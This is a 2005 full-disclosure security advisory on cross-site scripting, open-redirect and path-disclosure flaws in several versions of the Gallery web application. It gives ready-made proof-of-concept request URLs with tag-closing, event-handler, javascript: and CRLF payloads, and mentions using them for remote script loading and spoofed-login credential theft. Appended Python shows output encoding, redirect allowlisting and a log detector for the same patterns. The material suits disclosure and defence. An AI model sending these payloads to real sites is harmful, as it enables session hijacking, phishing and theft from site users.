~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: Gallery
Vendors: http://gallery.sourceforge.net
Versions: v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha
Platforms: Windows
Bug: Cross Site Scripting Vulnerability
Exploitation: Remote With Browser
Date: 17 Jan 2005
Author: Rafel Ivgi, The-Insider
E-Mail: the_insider@mail.com
Website: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Gallery is open to a Cross Site Scripting vulnerability, allowing a remote attacker to inject and execute scripts on the user's machine while the user is visiting a remote gallery.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

=======
2) Bugs
=======

Gallery v1.3.4-pl1 contains a vulnerability inside 'add_comment.php' in the 'index' field. The injection can be done using the classical tag closing: ">

For Example:
http:///gallery/add_comment.php?set_albumName=Eros&index=1">

Gallery v1.3.4-pl1 also contains a vulnerability inside 'slideshow_low.php' in ALL the fields. 'slideshow_low.php' contains the following form fields:

set_albumName
slide_index
slide_full
slide_loop
slide_pause
slide_dir

The injection can be done using the classical tag closing: ">

For Example:
http:///gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0">&slide_loop=0&slide_pause=3&slide_dir=1

There is also a Gallery v1.3.4-pl1 vulnerability inside 'search.php' in the 'username' field. The injection can be done using a hex encoded tag closing and an HTML event: %22%20onactivate%3D"alert%28%29"

For Example:
http:///gallery/search.php?searchstring=%22%20onactivate%3D"alert%28%29"

Gallery v1.4.4-pl2 contains a vulnerability inside 'login.php' in the 'username' field. The injection can be done using a hex encoded tag closing and an HTML event: %22%20onactivate%3D"alert%28%29"

For Example:
http:///gallery/login.php?gallery_popup=true&username=/*%22*/%20onactivate%3Dalert%28%29%3e

This version of Gallery also has an open redirection, which is a security risk because an attacker can send someone a link that redirects to his evil host name, or use it to make the user commit an attack or waste a target's resources.

For Example:
http:///gallery/do_command.php?set_fullOnly=on&return=&cmd=

All the vulnerabilities described above can be used to remotely call a JavaScript file. The injected JavaScript code is responsible for:

Automatic launching of malicious code (remote compromise by I.E exploits).
Identity theft using a spoofed re-login window (only for galleries with login).

Gallery v2.0 Alpha contains a vulnerability inside 'login.php' in the 'g2_form[subject]' field. The injection can be done using an inline javascript protocol call: javascript:alert()

For Example:
http:///g2/main.php?g2_controller=comment:AddComment&g2_form[formName]=AddComment&g2_itemId=&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview]=preview

Gallery v2.0 Alpha contains another vulnerability inside 'main.php' in the 'g2_subView' parameter. It is possible to replace any valid subView value, such as comment:ShowComments, with the admin value core:UserAdmin. This causes the gallery to wait 30 seconds and then print out the full path of the gallery on the server.

For Example:
http:///g2/main.php?g2_return=http:///main.php%3Fg2_view%3Dcore%3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3D<any valid/invalid session id such as: be869b98355e8d445c8ec8f97cb343da>&g2_view=core:UserAdmin&g2_subView=core:UserAdmin

Then the following data will be printed out to the attacker:

Fatal error: Maximum execution time of 30 seconds exceeded in /mnt/1//www//g2/modules/core/UserAdmin.inc on line 55

Second time:

Fatal error: Maximum execution time of 30 seconds exceeded in /mnt/1//www//g2/modules/core/classes/GalleryUtilities.class on line 596

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Gallery v1.3.4-pl1

http:///gallery/add_comment.php?set_albumName=Eros&index=1">
http:///gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3">alert()&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1
http:///gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0">&slide_loop=0&slide_pause=3&slide_dir=1
http:///gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0&slide_loop=0">&slide_pause=3&slide_dir=1
http:///gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0&slide_loop=0&slide_pause=3">&slide_dir=1
http:///gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1">
http:///gallery/search.php?searchstring=%22%20onclick%3D"alert%28%29"

Gallery v1.4.4-pl2

http:///gallery/login.php?gallery_popup=true&cool=rafi&username=/*%22*/%20onactivate%3Dalert%28%29%3e
http://<host>/gallery/do_command.php?set_fullOnly=on&return=http%3A%2F%2Fwww.google.com&cmd=

Gallery v2.0 Alpha

1) http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2_form[formName]=AddComment&g2_itemId=<valid item>&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview]=preview

2) http://<host>/g2/main.php?g2_return=<host>%2Fg2%2Fmain.php%3Fg2_view%3Dcore%3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3Dbe869b98355e8d445c8ec8f97cb343da%5C%5C0%5C%5C00%5C%5C%5C%5C0%5C%5C%5C%5C00%3B%250a%250d%250a%250drafi&g2_view=core:UserAdmin&g2_subView=core:UserAdmin

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
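Added example (not part of the advisory and not Gallery's own code): the two root causes described in section 2 are a request parameter reflected into an HTML attribute without encoding (the 'index', slideshow and 'username' fields, broken out of with "> or with an on* event handler) and a 'return' parameter passed to a redirect without validation. The Python below shows the corresponding fixes in generic form: attribute-safe output encoding of the reflected value, and an allowlist check on the redirect target. The parameter values, the /gallery/ path prefix and the helper names are constructed for illustration, and the checks are written to cover the payload shapes the advisory lists (tag closing, hex-encoded event handler, absolute/scheme-relative/javascript: redirect targets, CR/LF in the redirect value).

```python
import html
from urllib.parse import urlsplit

# Constructed parameter values modelled on the payload shapes in the advisory
# (example input, not captured traffic).
SAMPLE_INDEX = '1">'
SAMPLE_SEARCH = '" onactivate="alert()"'
SAMPLE_RETURNS = ["", "/gallery/view_album.php?set_albumName=Eros",
                  "http://www.example.com/", "//www.example.com/", "javascript:alert()"]


def render_hidden_field(name: str, value: str) -> str:
    """Reflect a request parameter into a hidden form field without letting it
    break out of the attribute.

    html.escape(..., quote=True) turns & < > " ' into entities, so a value such
    as 1"> becomes 1&quot;&gt; and can neither close the attribute nor open a tag.
    """
    return '<input type="hidden" name="%s" value="%s">' % (
        html.escape(name, quote=True), html.escape(value, quote=True))


# Assumed site layout: the gallery lives under /gallery/ (placeholder prefix).
ALLOWED_RETURN_PREFIX = "/gallery/"


def safe_return_target(return_param: str, default: str = "/gallery/") -> str:
    """Validate a do_command.php-style 'return' parameter before redirecting.

    Only a same-site relative path under ALLOWED_RETURN_PREFIX is accepted.
    Absolute URLs (http://other.host), scheme-relative URLs (//other.host),
    javascript: URLs and values containing control characters (CR/LF, which
    would otherwise end up in the Location header) fall back to the default.
    """
    if not return_param:
        return default
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in return_param):
        return default
    parts = urlsplit(return_param)
    if parts.scheme or parts.netloc:
        return default
    if not return_param.startswith(ALLOWED_RETURN_PREFIX):
        return default
    return return_param


def demo():
    """Run the sample values through both helpers and return the results."""
    fields = [render_hidden_field("index", SAMPLE_INDEX),
              render_hidden_field("searchstring", SAMPLE_SEARCH)]
    redirects = [safe_return_target(r) for r in SAMPLE_RETURNS]
    return fields, redirects


if __name__ == "__main__":
    fields, redirects = demo()
    print("\n".join(fields))
    print(redirects)
```

The encoding helper is only correct for values placed inside a double-quoted HTML attribute; a value that lands inside a script block, a URL or a CSS context needs that context's own encoding. The redirect check deliberately rejects anything with a scheme or host rather than trying to compare hostnames, which is the usual way open redirects slip through.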
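Added example (not part of the advisory): from the detection side, the section 2 and 3 request URLs have a recognisable shape in a web server access log, namely a query parameter whose percent-decoded value closes an attribute or tag, carries an on* event handler, or uses the javascript: scheme, plus a 'return' parameter pointing at another host. The Python below scans constructed Apache-style log lines for those patterns; the log lines, client addresses and hostnames are made up for the example, and the regexes are heuristics that should be tuned against the site's real parameter names before being used for alerting.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache-style access log lines (not real traffic). The requests
# mirror the parameter names and payload shapes named in the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jan/2005:10:00:01 +0000] "GET /gallery/view_album.php?set_albumName=Eros HTTP/1.1" 200 5120
10.0.0.7 - - [17/Jan/2005:10:00:02 +0000] "GET /gallery/add_comment.php?set_albumName=Eros&index=1%22%3E HTTP/1.1" 200 2048
10.0.0.7 - - [17/Jan/2005:10:00:03 +0000] "GET /gallery/search.php?searchstring=%22%20onactivate%3D%22alert%28%29%22 HTTP/1.1" 200 1900
10.0.0.9 - - [17/Jan/2005:10:00:04 +0000] "GET /gallery/do_command.php?set_fullOnly=on&return=http%3A%2F%2Fwww.example.com&cmd= HTTP/1.1" 302 0
10.0.0.9 - - [17/Jan/2005:10:00:05 +0000] "GET /g2/main.php?g2_view=core:ShowItem&g2_itemId=7150 HTTP/1.1" 200 7000
"""

# Pulls method and request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Patterns applied to the percent-decoded parameter value.
XSS_PATTERNS = [
    ("tag-closing", re.compile(r'["\']\s*>')),            # "> or '> attribute break-out
    ("event-handler", re.compile(r'\bon[a-z]+\s*=', re.I)),  # onactivate=, onclick=, ...
    ("javascript-uri", re.compile(r'javascript\s*:', re.I)),  # javascript: scheme
]


def inspect_request(target: str):
    """Return a list of (parameter, reason) findings for one request target."""
    parts = urlsplit(target)
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl already decodes once; decode again to catch double-encoding.
        decoded = unquote(value)
        for reason, pattern in XSS_PATTERNS:
            if pattern.search(decoded):
                findings.append((name, reason))
        if name == "return":
            rp = urlsplit(decoded)
            if rp.scheme or rp.netloc:
                findings.append((name, "external-redirect"))
    return findings


def scan_log(text: str):
    """Return (client_ip, path, findings) for each log line with a finding."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        findings = inspect_request(target)
        if findings:
            client_ip = line.split(" ", 1)[0]
            hits.append((client_ip, urlsplit(target).path, findings))
    return hits


if __name__ == "__main__":
    for ip, path, findings in scan_log(SAMPLE_LOG):
        print(ip, path, findings)
```

Because the match runs on the decoded value, the hex-encoded form from the advisory (%22%20onactivate%3D...) and the literal form are caught the same way. Requests that only hit the slow 'g2_subView=core:UserAdmin' path-disclosure bug are not flagged by these patterns; a rule for that case would key on the parameter value and the 30-second response time instead.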